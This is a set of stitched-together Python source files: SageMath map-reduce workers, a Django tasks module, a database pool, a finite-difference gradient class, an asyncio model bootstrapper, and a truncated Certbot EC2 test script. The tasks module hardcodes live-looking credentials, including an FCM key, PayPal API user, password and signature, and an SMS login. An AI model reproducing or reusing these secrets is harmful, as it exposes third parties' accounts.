assert len(self._todo) == 0, "Bad stop the result may be wrong"
self._stats[1] = reqs
self._stats[2] = thefts
logger.debug("Thief Exiting")
def steal(self):
r"""
Steal some node from another worker.
OUTPUT:
a node stolen from another worker chosen at random
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: from threading import Thread
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(2)
sage: w0, w1 = EX._workers
sage: w0._todo.append(42)
sage: thief0 = Thread(target = w0._thief, name="Thief")
sage: thief0.start()
sage: w1.steal()
42
"""
self._mapred._signal_task_done()
node = None
while node is None:
victim = self._mapred.random_worker()
if victim is not self:
logger.debug("Trying to steal from %s"%(victim.name))
victim._request.put(self._iproc)
self._stats[0] += 1
logger.debug("waiting from steal answer from %s"%(victim.name))
node = self._read_task.recv()
# logger.debug("Request answer: %s"%(node,))
if node is AbortError:
raise AbortError
# logger.debug("Received a stolen node: %s"%(node,))
self._stats[3] += 1
return node
def run(self):
r"""
The main function executed by the worker
Calls :meth:`run_myself` after possibly setting up parallel profiling.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._todo.append(EX.roots()[0])
sage: w.run()
sage: sleep(1)
sage: w._todo.append(None)
sage: EX.get_results()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Cleanups::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
profile = self._mapred._profile
if profile is not None:
from multiprocessing import current_process
import cProfile
PROFILER = cProfile.Profile()
PROFILER.runcall(self.run_myself)
output = profile + str(self._iproc)
logger.warn("Profiling in %s ..."%output)
PROFILER.dump_stats(output)
else:
self.run_myself()
def run_myself(self):
r"""
The main function executed by the worker
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._todo.append(EX.roots()[0])
sage: w.run_myself()
sage: sleep(1)
sage: w._todo.append(None)
sage: EX.get_results()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Cleanups::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
logger.debug("Started")
mapred = self._mapred
reduce_init = mapred.reduce_init
results = mapred._results
self._stats[0] = 0
self._stats[3] = 0
logger.debug("Launching thief")
self._thief = Thread(target = self._thief, name="Thief")
self._thief.start()
self._res = reduce_init()
try:
while True:
try:
node = self._todo.pop()
except IndexError:
node = self.steal()
self.walk_branch_locally(node)
if not self._reduce_locally:
self.send_partial_result()
except AbortError:
logger.debug("Worker Done !")
results.put(self._res)
results.put(None)
self._thief.join()
del self._request
self._read_task.close()
self._write_task.close()
del self._read_task, self._write_task
del self._mapred
del self._stats
logger.debug("Exiting")
def send_partial_result(self):
r"""
Send results to the MapReduce process
Send the result stored in ``self._res`` to the master an reinitialize it to
``master.reduce_init``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=4)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._res = 4
sage: w.send_partial_result()
sage: w._res
0
sage: EX._results.get()
4
"""
self._mapred._results.put(self._res)
self._res = self._mapred.reduce_init()
def walk_branch_locally(self, node):
r"""
Work locally
Performs the map/reduce computation on the subtrees rooted at ``node``.
INPUT:
- ``node`` -- the root of the subtree explored.
OUTPUT:
nothing, the result are stored in ``self._res``
This is where the actual work is performed.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=4)
sage: w = RESetMapReduceWorker(EX, 0, True)
sage: def sync(): pass
sage: w.synchronize = sync
sage: w._res = 0
sage: w.walk_branch_locally([])
sage: w._res
x^4 + x^3 + x^2 + x + 1
sage: w.walk_branch_locally(w._todo.pop())
sage: w._res
2*x^4 + x^3 + x^2 + x + 1
sage: while True: w.walk_branch_locally(w._todo.pop())
Traceback (most recent call last):
...
IndexError: pop from an empty deque
sage: w._res
24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
mapred = self._mapred
children = mapred.children
post_process = mapred.post_process
fun = mapred.map_function
reduc = mapred.reduce_function
# logger.debug("Working on %s..."%(node,))
while True:
res = post_process(node)
if res is not None:
self._res = reduc(self._res, fun(res))
newnodes = iter(children(node))
try:
node = next(newnodes)
except StopIteration:
return
self._todo.extend(newnodes)
class RESetMPExample(RESetMapReduce):
r"""
An example of map reduce class
INPUT:
- ``maxl`` -- the maximum size of permutations generated (default to `9`).
This compute the generating series of permutations counted by their size
upto size ``maxl``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample()
sage: EX.run()
362880*x^9 + 40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
.. SEEALSO:: This is an example of :class:`RESetMapReduce`
"""
def __init__(self, maxl = 9):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample()
<sage.parallel.map_reduce.RESetMPExample object at 0x...>
"""
RESetMapReduce.__init__(self)
from sage.rings.polynomial.polynomial_ring import polygen
from sage.rings.integer_ring import ZZ
self.x = polygen(ZZ, 'x')
self.maxl = maxl
def roots(self):
r"""
Return the empty permutation
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().roots()
[[]]
"""
return [[]]
def children(self, l):
r"""
Return the children of the permutation `l`.
INPUT:
- ``l`` -- a list containing a permutation
OUTPUT:
the lists of ``len(l)`` inserted at all possible positions into ``l``
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().children([1,0])
[[2, 1, 0], [1, 2, 0], [1, 0, 2]]
"""
return [ l[:i] + [len(l)] + l[i:]
for i in range(len(l)+1) ] if len(l) < self.maxl else []
def map_function(self, l):
r"""
The monomial associated to the permutation `l`
INPUT:
- ``l`` -- a list containing a permutation
OUTPUT:
``x^len(l)``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().map_function([1,0])
x^2
"""
return self.x**len(l)
class RESetParallelIterator(RESetMapReduce):
r"""
A parallel iterator for recursively enumerated sets
This demonstrate how to use :class:`RESetMapReduce` to get an iterator on
a recursively enumerated sets for which the computations are done in
parallel.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 15 else [])
sage: sum(1 for _ in S)
65535
"""
def map_function(self, z):
r"""
Return a singleton tuple
INPUT: ``z`` -- a node
OUTPUT: ``(z, )``
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 15 else [])
sage: S.map_function([1, 0])
([1, 0],)
"""
return (z,)
reduce_init = tuple
def __iter__(self):
r"""
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 15 else [])
sage: it = iter(S)
sage: next(it) # random
[1, 1, 0]
sage: next(it) # random
[1, 1, 0, 1]
sage: sum(1 for _ in it)
65533
"""
self.setup_workers(reduce_locally=False)
self.start_workers()
active_proc = self._nprocess
while True:
newres = self._results.get()
if newres is not None:
logger.debug("Got some results")
for r in newres:
yield r
else:
active_proc -= 1
if active_proc == 0:
break
self.finish()
|
tasks.py
|
import json, os, requests
# from email.MIMEImage import MIMEImage
from django.conf import settings
from django.core import mail
# from mailin import Mailin
import base64
from pprint import pprint
def send_pushnotifs(channels, message, auto_increment=True):
print ('>>> task send_pushnotifs running with channels "{}" and message "{}"'.format(channels, message))
from onedollar.models import OneDollarUserToken
url = "https://fcm.googleapis.com/fcm/send"
tokens = list(OneDollarUserToken.get_tokens_of_users(channels))
data = dict(message)
message['title'] = 'One Dollar'
message['click_action'] = 'ACTION_CLICK_NOTIFY'
push_data = json.dumps({
"registration_ids": tokens,
"notification": message,
"data": data,
})
headers = {
'content-type': "application/json",
'authorization': "key=AIzaSyC_wnchqs8pio0IeWDqoGcI1v6zLONFais",
'project_id': "26835176988",
}
response = requests.request("POST", url, data=push_data, headers=headers)
# def send_pushnotifs1(channels, message, auto_increment=True):
# print ('>>> task send_pushnotifs running with channels "{}" and message "{}"'.format(channels, message))
# connection = httplib.HTTPSConnection('api.parse.com', 443)
# connection.connect()
# try:
# message.setdefault("action", "com.nng.onedollar")
# if auto_increment:
# message.setdefault("badge", "Increment")
# except:
# pass
# push_data = json.dumps({
# "channels": list(channels),
# "data": message,
# })
# connection.request('POST', '/1/push', push_data, {
# "X-Parse-Application-Id": settings.PARSE_APPLICATION_ID,
# "X-Parse-REST-API-Key": settings.PARSE_REST_API_KEY,
# "Content-Type": "application/json"
# })
# result = json.loads(connection.getresponse().read())
# if result and result['result']:
# return result.get('result', False)
# return False
from threading import Thread
def send_async_email(msg):
print (msg.send())
# with app.app_context():
# print (msg.send())
# mail.send(msg)
def send_email(subject, html_content, emails, from_email=None):
if from_email is None:
from_email = settings.EMAIL_FROM
msg = mail.EmailMessage(subject, html_content, from_email, emails)
msg = mail.EmailMultiAlternatives(subject, html_content, from_email, emails)
msg.content_subtype = "html" # Main content is now text/html
msg.mixed_subtype = 'related'
# fp = open(os.path.join(settings.BASE_DIR, 'emailheader.png'))
# msg_img = MIMEImage(fp.read())
# fp.close()
# msg_img.add_header('Content-ID', '<emailheader.png>')
# msg.attach(msg_img)
thr = Thread(target=send_async_email, args=[msg])
thr.start()
# print (msg.send())
# def send_email_sendingblue(subject, html_content, emails, from_email=None):
# m = Mailin("https://api.sendinblue.com/v2.0","yA3MRfQW9wv0jTZp")
# with open(os.path.join(settings.BASE_DIR, 'emailheader.png'),"rb") as image_file:
# data = image_file.read()
# encoded_string = base64.encodestring(data)
# data = { "to" : {"ngochoang09121996@gmail.com":"to whom!"},
# "from" : [settings.EMAIL_FROM],
# "subject" : subject,
# "html" : html_content,
# "headers" : {"Content-Type": "text/html;charset=iso-8859-1","X-param1": "value1", "X-param2": "value2","X-Mailin-custom":"my custom value", "X-Mailin-IP": "102.102.1.2", "X-Mailin-Tag" : "My tag"},
# "inline_image" : {"emailheader.png" : encoded_string }
# }
# result = m.send_email(data)
# print(result)
# def send_sms(phone,code):
# connection = httplib.HTTPSConnection('api.smsapi.com', 443)
# connection.connect()
# url = '/sms.do?username=gpanot@giinger.com&password=ceac99e637c6ecb1e64740355e65f416&encoding=utf-8&to=%s&message=%s' %(phone,code)
# connection.request('GET', url)
# result = connection.getresponse().read()
# return True
def refund_paypal(transaction_id):
url = "https://api-3t.sandbox.paypal.com/nvp"
push_data = {
"USER": 'hhh+merchant_api1.nng.bz',
"PWD": 'Q8D42RQ4983CQK8P',
"SIGNATURE": 'AFcWxV21C7fd0v3bYYYRCpSSRl31AurlRYgTvul7Pvoq-MLEnIAuAkdq',
"METHOD": 'RefundTransaction',
"VERSION": 94,
"TRANSACTIONID": transaction_id,
"REFUNDTYPE" : 'Full'
}
headers = {}
response = requests.request("POST", url, data=push_data, headers=headers)
print (response)
from twitter import api
def twitter(html=None):
coca = api.Api(consumer_key=settings.CONSUMER_KEY,
consumer_secret=settings.CONSUMER_SECRET,
access_token_key=settings.ACCESS_TOKEN,
access_token_secret=settings.ACCESS_TOKEN_SECRET)
return coca.GetSearch(
raw_query="q=%23HiEfficiencyBar&result_type=recent&count=5")
|
connection.py
|
import time
import collections
import threading
from .session import *
class Connection(object):
def __init__(self, host, user, password, database, name, port=3306, connections=1, init_thread=True, autocommit=True):
self.__connection_pool = collections.defaultdict(list)
self.__default_pool = name
self.add_multiple_connections(host, user, password, database, name, port, connections, autocommit)
self.__thread = threading.Thread(target=self.thread_reconnect)
if init_thread:
self.__thread.start()
def execute(self, query, name_pool=None, fetch_all=True):
if name_pool is None:
name_pool = self.__default_pool
response = ''
try:
for conn in self.__connection_pool[name_pool]:
if conn.connected:
res = conn.query(query, fetch_all)
if res is None and conn.connected is False:
continue
response = res
break
return response
except Exception as e:
print(str(e))
return None
def get_conn(self, name_pool=None):
if name_pool is None:
name_pool = self.__default_pool
return self.__connection_pool[name_pool][0].get_connection()
def thread_reconnect(self):
while True:
for key in self.__connection_pool.keys():
for conn in self.__connection_pool[key]:
if conn.connected is False:
conn.reconnect()
time.sleep(30)
def set_default_name_pool(self, name):
self.__default_pool = name
def add_new_connection(self, host, user, password, database, name, port, autocommit):
self.__connection_pool[name].append(Session(host, user, password, database, port, autocommit=autocommit))
def add_multiple_connections(self, host, user, password, database, name, port, connections, autocommit):
for i in range(0, connections):
self.add_new_connection(host, user, password, database, name, port, autocommit)
def close_pool(self, name=None):
if name is None:
name = self.__default_pool
for con in self.__connection_pool[name]:
con.close()
|
FDGradient.py
|
'''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
# -*-mode: python; py-indent-offset: 4; tab-width: 8; coding: iso-8859-1 -*-
import numpy as np
from copy import deepcopy
from .FDSecondOrderCentered import FDSecondOrderCentered
from .FDFirstOrderUpwind import FDFirstOrderUpwind, FDFirstOrderUpwindComplexStep
import multiprocessing
class FDGradient(object):
"""
Finite differences gradient.
Computes the gradient by finite differences for a given scheme order.
"""
def __init__(self, scheme_order, f_pointer, df_pointer=None, fd_step=1.e-8, bounds=None):
"""
Constructor.
Args :
scheme : the numerical scheme
f_pointer : the pointer to the function on which
finite differences are computed.
"""
self.__scheme_order = scheme_order
self.fd_step = fd_step
if scheme_order == 1:
self.__scheme = FDFirstOrderUpwind(fd_step, bounds)
elif scheme_order == 1j:
self.__scheme = FDFirstOrderUpwindComplexStep(fd_step, bounds)
elif scheme_order == 2:
self.__scheme = FDSecondOrderCentered(fd_step, bounds)
else:
raise Exception(
"Scheme of order" +
str(scheme_order) +
" not available now.")
self.__fpointer = f_pointer
self.__dfpointer = df_pointer
self.multi_proc = False
def set_bounds(self, bounds):
self.__scheme.set_bounds(bounds)
def set_multi_proc(self, multi):
self.multi_proc = multi
def get_scheme(self):
"""
Accessor for the scheme.
Returns :
The numerical scheme
"""
return self.__scheme
def __worker(self, index, x_in, return_dict):
out = self.__fpointer(x_in)
return_dict[index] = out
def grad_f(self, x, args=None):
"""
Gradient calculation. Calls the numerical scheme.
Args:
x : the variables at which gradient is computed.
"""
#print('grad_f call')
self.__scheme.set_x(x)
self.__scheme.generate_samples()
samples = self.__scheme.get_samples()
n_samples = len(samples)
if self.multi_proc:
n_procs = multiprocessing.cpu_count()
print('FDGradient: multi-process grad_f, parallel run on ',
n_procs, ' procs.')
manager = multiprocessing.Manager()
return_dict = manager.dict()
n = 0
while n < n_samples:
if n + n_procs < n_samples:
n_subs = n_procs
else:
n_subs = n_samples - n
jobs = []
for i in range(n_subs):
index = n + i
x_in = samples[index]
p = multiprocessing.Process(
target=self.__worker, args=(index, x_in, return_dict))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
n += n_subs
y = []
for i in range(n_samples):
y.append(return_dict[i])
else:
y = []
for x in samples:
#print('x =',x)
if args is None:
y.append(deepcopy(self.__fpointer(x)))
else:
y.append(deepcopy(self.__fpointer(x, *args)))
grad_index = len(y)
#print('grad index = ',grad_index)
s = np.shape(y[0])
if len(s) < 2:
y_array = np.array(y)
elif len(s) == 2:
p = len(y)
if self.get_scheme().order == 1j:
y_array = np.zeros((s[0], s[1], p), dtype=np.complex128)
else:
y_array = np.zeros((s[0], s[1], p))
for i in range(p):
y_array[:, :, i] = y[i]
else:
raise Exception(
"Functional outputs of dimension >2 are not yet handled.")
return self.__scheme.compute_grad(y_array)
def hess_f(self, x):
"""
Hessian computation by finite differences based on numerical scheme provided at construction
Args:
x : the variables at which hessian is computed.
"""
if self.__dfpointer is None:
raise Exception(
"Gradient is required to compute finite differences Hessian.")
self.__scheme.set_x(x)
self.__scheme.generate_samples()
dy_array = np.zeros((len(self.__scheme.get_samples()), len(x)))
for i, x in enumerate(self.__scheme.get_samples()):
dy_array[i, :] = self.__dfpointer(x)
return self.__scheme.compute_hessian(dy_array)
def vect_hess_f(self, x, nb_func):
"""
Vectorized hessian computation
Args:
x : the variables at which hessian is computed.
"""
if self.__dfpointer is None:
raise Exception(
"Gradient is required to compute finite differences Hessian.")
self.__scheme.set_x(x)
self.__scheme.generate_samples()
dy_array_list = np.zeros(
(nb_func, len(self.__scheme.get_samples()), len(x)))
for i, x in enumerate(self.__scheme.get_samples()):
dy_array_list[:, i, :] = self.__dfpointer(x)
H_list = []
for f in range(nb_func):
H_list.append(self.__scheme.compute_hessian(
dy_array_list[f, :, :]))
return H_list
|
ModelBootstrap.py
|
import copy
import logging
import asyncio
import threading
import sys
import queue
from concurrent.futures import ThreadPoolExecutor
#fly
from .ModelIO import ModelIO
from .ModelConfig import ModelConfig
from pprint import pprint
from .ModelManager import ModelManager
from . import ModelCreate
from . import logSetup
class ModelBootstrap(object):
def __init__(self,*args,**kwargs):
# Setup log configurations
logSetup.logSetup(*args,**kwargs)
self.logger = logging.getLogger(__name__)
self._loop = asyncio.get_event_loop()
self._ModelConfig = ModelConfig(kwargs.get('filename'))
self._modelNames = self._ModelConfig.getModels()
self._ModelCreate = ModelCreate.ModelCreate(*args,**kwargs)
self._modelInit = threading.Event()
self.createModels(*args,**kwargs)
self._ModelManager = ModelManager()
self.createConnections(*args,**kwargs)
self.startModels(*args,**kwargs)
def createTasks(self,model=None,executors=1,params=None,loop=None,*args,**kwargs):
tasks=[]
for i in range(executors):
for func in [self.producer, self.consumer]:
tasks.append(asyncio.ensure_future(func(*params,loop=loop),loop=loop))
if model.getModelType() == 'generator':
break
return tasks
def startThread(self,tasks,loop):
asyncio.set_event_loop(loop)
loop.run_until_complete(asyncio.gather(*tasks,loop=loop))
def startModels(self,*args,**kwargs):
for modelName,model in self._ModelManager.getModels().items():
tasks=[]
loop = asyncio.new_event_loop()
baseParams = [model, model.getQOut(), model.getQErr(),
model.getQOnSuccess(), model.getQOnFailure()]
if model.getInputPorts() == 'any':
for q in model.getQIn():
resultQ = queue.Queue()
params = baseParams + [[q],resultQ]
tasks = tasks + self.createTasks(model=model,executors=int(model.getThreadCount()),params=params,loop=loop)
else:
resultQ = queue.Queue()
params = baseParams + [model.getQIn(),resultQ]
tasks = tasks + self.createTasks(model=model, executors=int(model.getThreadCount()), params=params,loop=loop)
t = threading.Thread(target=self.startThread,args=(tasks,loop,))
t.start()
self.logger.info('Created Model - %s.', str(modelName))
self.logger.info('All models created. Launching event loop.')
def qGet(self,q):
return q.get()
def qPut(self,q,task_result):
q.put(task_result)
async def producer(self,model,qOut,qErr,qOnSuccess,qOnFailure,qIn,resultQ,loop=None):
with ThreadPoolExecutor(max_workers=10) as executor:
modelType = model.getModelType()
while True:
try:
taskInput = {}
for q in qIn:
task_result = await loop.run_in_executor(executor, self.qGet, q)
taskInput.update(task_result)
await model.getCallable()(resultQ,loop,**taskInput)
if modelType == 'generator':
break
except:
self.logger.error('%s in Model - %s, Program - %s.%s.%s',str(sys.exc_info()),str(model.getModelName()), model.getModuleName(),model.getClassName(),model.getMethodName())
async def consumer(self,model,qOut,qErr,qOnSuccess,qOnFailure,qIn,resultQ,loop=None):
with ThreadPoolExecutor(max_workers=10) as executor:
modelType = model.getModelType()
while True:
try:
if modelType == 'sink':
break
task_result = await loop.run_in_executor(executor, self.qGet, resultQ)
if modelType == 'connection':
if task_result.get('onFailure'):
del [task_result['onFailure']]
for q in qOnFailure:
await loop.run_in_executor(executor, self.qPut, q, task_result)
else:
for q in qOnSuccess:
await loop.run_in_executor(executor, self.qPut, q, task_result)
else:
for q in qOut:
await loop.run_in_executor(executor, self.qPut, q, task_result)
except:
self.logger.error('%s in Model - %s, Program - %s.%s.%s',str(sys.exc_info()),str(model.getModelName()), model.getModuleName(),model.getClassName(),model.getMethodName())
def createModels(self,*args,**kwargs):
for modelName in self._modelNames:
self._ModelCreate.create(modelName=modelName,model_init_event=self._modelInit,*args,**kwargs)
def createConnections(self,*args,**kwargs):
for _connection in self._ModelManager.getModelConnections():
self._ModelCreate.create(modelName='connection',connectionObject=_connection,model_init_event=self._modelInit,*args,**kwargs)
|
multitester.py
|
"""
Certbot Integration Test Tool
- Configures (canned) boulder server
- Launches EC2 instances with a given list of AMIs for different distros
- Copies certbot repo and puts it on the instances
- Runs certbot tests (bash scripts) on all of these
- Logs execution and success/fail for debugging
Notes:
- Some AWS images, e.g. official CentOS and FreeBSD images
require acceptance of user terms on the AWS marketplace
website. This can't be automated.
- AWS EC2 has a default limit of 20 t2/t1 instances, if more
are needed, they need to be requested via online webform.
Usage:
- Requires AWS IAM secrets to be set up with aws cli
- Requires an AWS associated keyfile <keyname>.pem
>aws configure --profile HappyHacker
[interactive: enter secrets for IAM role]
>aws ec2 create-key-pair --profile HappyHacker --key-name MyKeyPair \
--query 'KeyMaterial' --output text > MyKeyPair.pem
then:
>python multitester.py targets.yaml MyKeyPair.pem HappyHacker scripts/test_leauto_upgrades.sh
see:
https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html
https://docs.aws.amazon.com/cli/latest/userguide/cli-ec2-keypairs.html
"""
from __future__ import print_function
from __future__ import with_statement
import argparse
import multiprocessing as mp
from multiprocessing import Manager
import os
import socket
import sys
import time
import traceback
import boto3
from botocore.exceptions import ClientError
from six.moves.urllib import error as urllib_error
from six.moves.urllib import request as urllib_request
import yaml
from fabric import Config
from fabric import Connection
# Command line parser
#-------------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Builds EC2 cluster for testing.')
parser.add_argument('config_file',
help='yaml configuration file for AWS server cluster')
parser.add_argument('key_file',
help='key file (<keyname>.pem) for AWS')
parser.add_argument('aws_profile',
help='profile for AWS (i.e. as in ~/.aws/certificates)')
parser.add_argument('test_script',
default='test_letsencrypt_auto_certonly_standalone.sh',
help='path of bash script in to deploy and run')
parser.add_argument('--repo',
default='https://github.com/letsencrypt/letsencrypt.git',
help='certbot git repo to use')
parser.add_argument('--branch',
default='~',
help='certbot git branch to trial')
parser.add_argument('--pull_request',
default='~',
help='letsencrypt/letsencrypt pull request to trial')
parser.add_argument('--merge_master',
action='store_true',
help="if set merges PR into master branch of letsencrypt/letsencrypt")
parser.add_argument('--saveinstances',
action='store_true',
help="don't kill EC2 instances after run, useful for debugging")
parser.add_argument('--alt_pip',
default='',
help="server from which to pull candidate release packages")
parser.add_argument('--killboulder',
action='store_true',
help="do not leave a persistent boulder server running")
parser.add_argument('--boulderonly',
action='store_true',
help="only make a boulder server")
cl_args = parser.parse_args()
# Credential Variables
#-------------------------------------------------------------------------------
# assumes naming: <key_filename> = <keyname>.pem
KEYFILE = cl_args.key_file
KEYNAME = os.path.split(cl_args.key_file)[1].split('.pem')[0]
PROFILE = None if cl_args.aws_profile == 'SET_BY_ENV' else cl_args.aws_profile
# Globals
#-------------------------------------------------------------------------------
BOULDER_AMI = 'ami-072a9534772bec854' # premade shared boulder AMI 18.04LTS us-east-1
SECURITY_GROUP_NAME = 'certbot-security-group'
SENTINEL = None #queue kill signal
SUBNET_NAME = 'certbot-subnet'
class Status(object):
"""Possible statuses of client tests."""
PASS = 'pass'
FAIL = 'fail'
# Boto3/AWS automation functions
#-------------------------------------------------------------------------------
def should_use_subnet(subnet):
"""Should we use the given subnet for these tests?
We should if it is the default subnet for the availability zone or the
subnet is named "certbot-subnet".
"""
if not subnet.map_public_ip_on_launch:
return False
if subnet.default_for_az:
return True
for tag in subnet.tags:
if tag['Key'] == 'Name' and tag['Value'] == SUBNET_NAME:
return True
return False
def make_security_group(vpc):
"""Creates a security group in the given VPC."""
# will fail if security group of GroupName already exists
# cannot have duplicate SGs of the same name
mysg = vpc.create_security_group(GroupName=SECURITY_GROUP_NAME,
Description='security group for automated testing')
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=22, ToPort=22)
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=80, ToPort=80)
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=443, ToPort=443)
# for boulder wfe (http) server
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=4000, ToPort=4000)
# for mosh
mysg.authorize_ingress(IpProtocol="udp", CidrIp="0.0.0.0/0", FromPort=60000, ToPort=61000)
return mysg
def make_instance(ec2_client,
instance_name,
ami_id,
keyname,
security_group_id,
subnet_id,
machine_type='t2.micro',
userdata=""): #userdata contains bash or cloud-init script
block_device_mappings = _get_block_device_mappings(ec2_client, ami_id)
tags = [{'Key': 'Name', 'Value': instance_name}]
tag_spec = [{'ResourceType': 'instance', 'Tags': tags}]
return ec2_client.create_instances(
BlockDeviceMappings=block_device_mappings,
ImageId=ami_id,
SecurityGroupIds=[security_group_id],
SubnetId=subnet_id,
KeyName=keyname,
MinCount=1,
MaxCount=1,
UserData=userdata,
InstanceType=machine_type,
TagSpecifications=tag_spec)[0]
def _get_block_device_mappings(ec2_client, ami_id):
"""Returns the list of block device mappings to ensure cleanup.
This list sets connected EBS volumes to be deleted when the EC2
instance is terminated.
"""
# Not all devices use EBS, but the default value for DeleteOnTermination
# when the device does use EBS is true. See:
# * https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-blockdev-mapping.html
# * https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-blockdev-template.html
return [{'DeviceName': mapping['DeviceName'],
'Ebs': {'DeleteOnTermination': True}}
for mapping in ec2_client.Image(ami_id).block_device_mappings
if not mapping.get('Ebs', {}).get('DeleteOnTermination', True)]
# Helper Routines
#-------------------------------------------------------------------------------
def block_until_http_ready(urlstring, wait_time=10, timeout=240):
"Blocks until server at urlstring can respond to http requests"
server_ready = False
t_elapsed = 0
while not server_ready and t_elapsed < timeout:
try:
sys.stdout.write('.')
sys.stdout.flush()
req = urllib_request.Request(urlstring)
response = urllib_request.urlopen(req)
#if response.code == 200:
server_ready = True
except urllib_error.URLError:
pass
time.sleep(wait_time)
t_elapsed += wait_time
def block_until_ssh_open(ipstring, wait_time=10, timeout=120):
"Blocks until server at ipstring has an open port 22"
reached = False
t_elapsed = 0
while not reached and t_elapsed < timeout:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ipstring, 22))
reached = True
except socket.error as err:
time.sleep(wait_time)
t_elapsed += wait_time
sock.close()
def block_until_instance_ready(booting_instance, wait_time=5, extra_wait_time=20):
"Blocks booting_instance until AWS EC2 instance is ready to accept SSH connections"
state = booting_instance.state['Name']
ip = booting_instance.public_ip_address
while state != 'running' or ip is None:
time.sleep(wait_time)
# The instance needs to be reloaded to update its local attributes. See
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Instance.reload.
booting_instance.reload()
state = booting_instance.state['Name']
ip = booting_instance.public_ip_address
block_until_ssh_open(ip)
time.sleep(extra_wait_time)
return booting_instance
# Fabric Routines
#-------------------------------------------------------------------------------
def local_git_clone(local_cxn, repo_url, log_dir):
"""clones master of repo_url"""
local_cxn.local('cd %s && if [ -d letsencrypt ]; then rm -rf letsencrypt; fi' % log_dir)
local_cxn.local('cd %s && git clone %s letsencrypt'% (log_dir, repo_url))
local_cxn.local('cd %s && tar czf le.tar.gz letsencrypt'% log_dir)
def local_git_branch(local_cxn, repo_url, branch_name, log_dir):
"""clones branch <branch_name> of repo_url"""
local_cxn.local('cd %s && if [ -d letsencrypt ]; then rm -rf letsencrypt; fi' % log_dir)
local_cxn.local('cd %s && git clone %s letsencrypt --branch %s --single-branch'%
(log_dir, repo_url, branch_name))
local_cxn.local('cd %s && tar czf le.tar.gz letsencrypt' % log_dir)
def local_git_PR(local_cxn, repo_url, PRnumstr, log_dir, merge_master=True):
"""clones specified pull request from repo_url and optionally merges into master"""
local_cxn.local('cd %s && if [ -d letsencrypt ]; then rm -rf letsencrypt; fi' % log_dir)
local_cxn.local('cd %s && git clone %s letsencrypt' % (log_dir, repo_url))
local_cxn.local('cd %s && cd letsencrypt && '
'git fetch origin pull/%s/head:lePRtest' % (log_dir, PRnumstr))
local_cxn.local('cd %s && cd letsencrypt && git checkout lePRtest' % log_dir)
if merge_master:
local_cxn.local('cd %s && cd letsencrypt && git remote update origin' % log_dir)
local_cxn.local('cd %s && cd letsencrypt && '
'git merge origin/master -m "testmerge"' % log_dir)
local_cxn.local('cd %s && tar czf le.tar.gz letsencrypt' % log_dir)
def local_repo_to_remote(cxn, log_dir):
"""copies local tarball of repo to remote"""
filename = 'le.tar.gz'
local_path = os.path.join(log_dir, filename)
cxn.put(local=local_path, remote='')
cxn.run('tar xzf %s' % filename)
def local_repo_clean(local_cxn, log_dir):
"""delete tarball"""
filename = 'le.tar.gz'
local_path = os.path.join(log_dir, filename)
local_cxn.local('rm %s' % local_path)
def deploy_script(cxn, scriptpath, *args):
"""copies to remote and executes local script"""
cxn.put(local=scriptpath, remote='', preserve_mode=True)
scriptfile = os.path.split(scriptpath)[1]
args_str = ' '.join(args)
cxn.run('./'+scriptfile+' '+args_str)
def run_boulder(cxn):
boulder_path = '$GOPATH/src/github.com/letsencrypt/boulder'
